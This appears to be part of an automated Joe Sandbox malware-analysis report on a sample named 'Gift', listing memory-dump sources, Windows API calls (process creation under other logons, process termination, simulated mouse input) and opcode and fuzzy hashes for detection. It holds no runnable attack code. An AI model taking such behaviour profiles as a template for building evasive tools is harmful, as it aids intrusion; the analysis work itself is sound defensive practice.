                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: 8a95e75db25452269a53be3746d2a1bc2f9a5ca0ebf7c2ac9b56cb63e4cdf1d4
                                                                          • Instruction ID: 016df6cdeee1ee8a5d770177914bfe1459cc279e359015140b47d2768e022ded
                                                                          • Opcode Fuzzy Hash: 8a95e75db25452269a53be3746d2a1bc2f9a5ca0ebf7c2ac9b56cb63e4cdf1d4
                                                                          • Instruction Fuzzy Hash: 0E518C31118240AFD716EF64C885E6FBBE9FF84314F04492DF995872A2DB31E919CB52
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0032F6A2
                                                                          • VariantClear.OLEAUT32(00000013), ref: 0032F714
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0032F76F
                                                                          • _memmove.LIBCMT ref: 0032F799
                                                                          • VariantClear.OLEAUT32(?), ref: 0032F7E6
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0032F814
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: 9a6ec41e106fce4932269326abc0862d6ec8fe08eaed38bf3d1e569f8c9801c2
                                                                          • Instruction ID: 5cdb402d5b2c4ecb9c26be0dbff36918a5ede2482ff1486f663683a8b8030b35
                                                                          • Opcode Fuzzy Hash: 9a6ec41e106fce4932269326abc0862d6ec8fe08eaed38bf3d1e569f8c9801c2
                                                                          • Instruction Fuzzy Hash: 735148B5A00219EFDB15CF58D884AAAB7B8FF4C354B15856AED59DB300D730E911CFA0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003329FF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332A4A
                                                                          • IsMenu.USER32(00000000), ref: 00332A6A
                                                                          • CreatePopupMenu.USER32 ref: 00332A9E
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00332AFC
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00332B2D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 5f48a54d53f5d05836170a1706c56dd0c81ea2a988f800e11f9c07cc0238d7df
                                                                          • Instruction ID: 14c80d480cf0e31b6e1f49a57d8d29ef71e9227bf5abc7fc8ea18b83b2f42cbe
                                                                          • Opcode Fuzzy Hash: 5f48a54d53f5d05836170a1706c56dd0c81ea2a988f800e11f9c07cc0238d7df
                                                                          • Instruction Fuzzy Hash: F5519C70A00349DBDF26CF68D8C9AAFFBF8AF45314F114159E8119B2A1DBB09944CB51
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 002D1B76
                                                                          • GetWindowRect.USER32(?,?), ref: 002D1BDA
                                                                          • ScreenToClient.USER32(?,?), ref: 002D1BF7
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002D1C08
                                                                          • EndPaint.USER32(?,?), ref: 002D1C52
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: be87bd2555b800b28c3cb4405611e90350ba6c286cb299b8da0297c6dac335a8
                                                                          • Instruction ID: daf13390cc5321869308e4270dacc041155c58fb1f81ecf8e4475bb35827eab9
                                                                          • Opcode Fuzzy Hash: be87bd2555b800b28c3cb4405611e90350ba6c286cb299b8da0297c6dac335a8
                                                                          • Instruction Fuzzy Hash: 9541DE30128300AFD712DF24CC89FBA7BE8EB46324F14066AF995872E1C7719C65DB62
                                                                          APIs
                                                                          • ShowWindow.USER32(003977B0,00000000,013752A0,?,?,003977B0,?,0035BC1A,?,?), ref: 0035BD84
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0035BDA8
                                                                          • ShowWindow.USER32(003977B0,00000000,013752A0,?,?,003977B0,?,0035BC1A,?,?), ref: 0035BE08
                                                                          • ShowWindow.USER32(00000000,00000004,?,0035BC1A,?,?), ref: 0035BE1A
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0035BE3E
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0035BE61
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: fec93c84daa3e3357c1de5515fa014ca17f8e73b7283284405d60238493a7e09
                                                                          • Instruction ID: 3b570988c3028311b73c724483ab310aa9f9fbd8ea735b79e1bd6d0ce16a0a4a
                                                                          • Opcode Fuzzy Hash: fec93c84daa3e3357c1de5515fa014ca17f8e73b7283284405d60238493a7e09
                                                                          • Instruction Fuzzy Hash: 13411734600144AFDB27CF28D48AF95BBF1BB05316F1981A9EE588F2B2C771A859CB51
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0034550C,?,?,00000000,00000001), ref: 00347796
                                                                            • Part of subcall function 0034406C: GetWindowRect.USER32(?,?), ref: 0034407F
                                                                          • GetDesktopWindow.USER32 ref: 003477C0
                                                                          • GetWindowRect.USER32(00000000), ref: 003477C7
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003477F9
                                                                            • Part of subcall function 003357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335877
                                                                          • GetCursorPos.USER32(?), ref: 00347825
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00347883
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 2546d23ae16ef7278c2b4bcffd5fc1e23eae8f5cf698b5dd4105b9307fbd8003
                                                                          • Instruction ID: 4e547574822f786ee63c34bb64d4ac787f9e0129a19e3a25ff8b0bbf32d61de1
                                                                          • Opcode Fuzzy Hash: 2546d23ae16ef7278c2b4bcffd5fc1e23eae8f5cf698b5dd4105b9307fbd8003
                                                                          • Instruction Fuzzy Hash: BF31B072508305ABD725DF14C84AF9BB7E9FF88314F004919F599AB191CB70F909CBA2
                                                                          APIs
                                                                            • Part of subcall function 00328CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328CDE
                                                                            • Part of subcall function 00328CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328CE8
                                                                            • Part of subcall function 00328CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328CF7
                                                                            • Part of subcall function 00328CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00328CFE
                                                                            • Part of subcall function 00328CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00328D14
                                                                          • GetLengthSid.ADVAPI32(?,00000000,0032904D), ref: 00329482
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0032948E
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00329495
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003294AE
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0032904D), ref: 003294C2
                                                                          • HeapFree.KERNEL32(00000000), ref: 003294C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: 82162ea461f507e589b44802d53c12a540d2ca5f9e4d2896f595e48a1153ec6e
                                                                          • Instruction ID: 276e2798ad2ba56bb9689af0f193c495b71a91c8dcdae553e83aefebe195b043
                                                                          • Opcode Fuzzy Hash: 82162ea461f507e589b44802d53c12a540d2ca5f9e4d2896f595e48a1153ec6e
                                                                          • Instruction Fuzzy Hash: 0C11EE32901214FFDB16EFA5EC1ABAF7BADFB42316F10801AE84197210C7369901CB60
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00329200
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00329207
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00329216
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00329221
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00329250
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00329264
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
                                                                          • Opcode ID: 99250c39683b8b74085202470a92cc96fb6388b21523ef1de89b7e873af57327
                                                                          • Instruction ID: 40d750099615e894a1bb18b96c0582974dcd6e3f84131f1ae7308c724a268560
                                                                          • Opcode Fuzzy Hash: 99250c39683b8b74085202470a92cc96fb6388b21523ef1de89b7e873af57327
                                                                          • Instruction Fuzzy Hash: 6E11477250120EEBDB028FA4ED49BDA7BADEF08704F058025FA04A2160C7B29D60EB60
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0032C34E
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0032C35F
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0032C366
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0032C36E
                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0032C385
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0032C397
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: c0c35e4fd04caa4961a6b33b12124cd9ddf2394bde0d120a5d9ce15c0391ab22
                                                                          • Instruction ID: 4242bdefc8090e2474143bccf76010ac0fee0b15446fce3f8ee02a934090ec90
                                                                          • Opcode Fuzzy Hash: c0c35e4fd04caa4961a6b33b12124cd9ddf2394bde0d120a5d9ce15c0391ab22
                                                                          • Instruction Fuzzy Hash: 99014475E00219BBEF119BA59C4AA5FBFBCEB48751F008065FA04AB290D6B49D10CFA0
                                                                          APIs
                                                                            • Part of subcall function 002D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                            • Part of subcall function 002D16CF: BeginPath.GDI32(?), ref: 002D174F
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0035C57C
                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0035C590
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C59E
                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0035C5AE
                                                                          • EndPath.GDI32(00000000), ref: 0035C5BE
                                                                          • StrokePath.GDI32(00000000), ref: 0035C5CE
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                          • String ID:
                                                                          • API String ID: 43455801-0
                                                                          • Opcode ID: 9496e3ffbda9f416e72a5db651b40ff96a0531caf33614113879b308de9139ab
                                                                          • Instruction ID: 60e97e2b3042a7883b75ea310b277af02d804068d3ece28f9c5aa575c538d166
                                                                          • Opcode Fuzzy Hash: 9496e3ffbda9f416e72a5db651b40ff96a0531caf33614113879b308de9139ab
                                                                          • Instruction Fuzzy Hash: FA11097600410CBFDB129F91DC89EAA7FADEB09354F048421FA195A1A0D7B2AE55DBA0
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F07EC
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 002F07F4
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F07FF
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F080A
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 002F0812
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F081A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: eba020aeb37a16ae4a4d909555f5f05f33beff303aa1328b8160f43585e31568
                                                                          • Instruction ID: 270260a9f773f68e3155bbd5872182e02b8f7c86eca372adcd9f17eb6f2c8695
                                                                          • Opcode Fuzzy Hash: eba020aeb37a16ae4a4d909555f5f05f33beff303aa1328b8160f43585e31568
                                                                          • Instruction Fuzzy Hash: 9D0148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847941C7F5A864CBE5
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003359B4
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003359CA
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003359D9
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359E8
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359F2
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003359F9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: 27c9ccfeda834d2e53cac3510ed07ee92619bff8fdb66376b101a4deabdf00bc
                                                                          • Instruction ID: d7f33707041e992f0d0c73068e0838a21cd46e11114d9a65fe7cd0d3f29821d2
                                                                          • Opcode Fuzzy Hash: 27c9ccfeda834d2e53cac3510ed07ee92619bff8fdb66376b101a4deabdf00bc
                                                                          • Instruction Fuzzy Hash: 5AF03A36241158BBE7265B92DC0EEEF7B7CEFCBB22F004159FA05D1050EBE01A1186B5
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003377FE
                                                                          • EnterCriticalSection.KERNEL32(?,?,002DC2B6,?,?), ref: 0033780F
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,002DC2B6,?,?), ref: 0033781C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,002DC2B6,?,?), ref: 00337829
                                                                            • Part of subcall function 003371F0: CloseHandle.KERNEL32(00000000,?,00337836,?,002DC2B6,?,?), ref: 003371FA
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0033783C
                                                                          • LeaveCriticalSection.KERNEL32(?,?,002DC2B6,?,?), ref: 00337843
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 3278be9d2efbc0f91aef05ff5a1b2fc553f16b32f84bc619854857c593305324
                                                                          • Instruction ID: fbe6cf8467d122e67c0a44aeab7ea55f85ad21181a05f80de6fe29ac02c10315
                                                                          • Opcode Fuzzy Hash: 3278be9d2efbc0f91aef05ff5a1b2fc553f16b32f84bc619854857c593305324
                                                                          • Instruction Fuzzy Hash: 12F0BE72044202ABD7272B64EC8EAEF373DFF05702F154821F102940A0CBF55811CB60
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00329555
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00329561
                                                                          • CloseHandle.KERNEL32(?), ref: 0032956A
                                                                          • CloseHandle.KERNEL32(?), ref: 00329572
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0032957B
                                                                          • HeapFree.KERNEL32(00000000), ref: 00329582
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: 9112b8885bc395bb9361cc19a4f31f933e27dcf553faa434d6546e3204d52642
                                                                          • Instruction ID: bc44c52bd9cddb58d86bb54688ddeb53f102c0009c81227cbe3e100ab6a46721
                                                                          • Opcode Fuzzy Hash: 9112b8885bc395bb9361cc19a4f31f933e27dcf553faa434d6546e3204d52642
                                                                          • Instruction Fuzzy Hash: F5E0C23A004101BBDA071BE1EC0E95ABB2DFB4A722B108620F21581170CBB2A460DB50
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00348CFD
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00348E0C
                                                                          • VariantClear.OLEAUT32(?), ref: 00348F84
                                                                            • Part of subcall function 00337B1D: VariantInit.OLEAUT32(00000000), ref: 00337B5D
                                                                            • Part of subcall function 00337B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00337B66
                                                                            • Part of subcall function 00337B1D: VariantClear.OLEAUT32(00000000), ref: 00337B72
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: aba23f1cecda9b745166ab2a3d6a37943cff6bcff16c669cf5a55f31fd802870
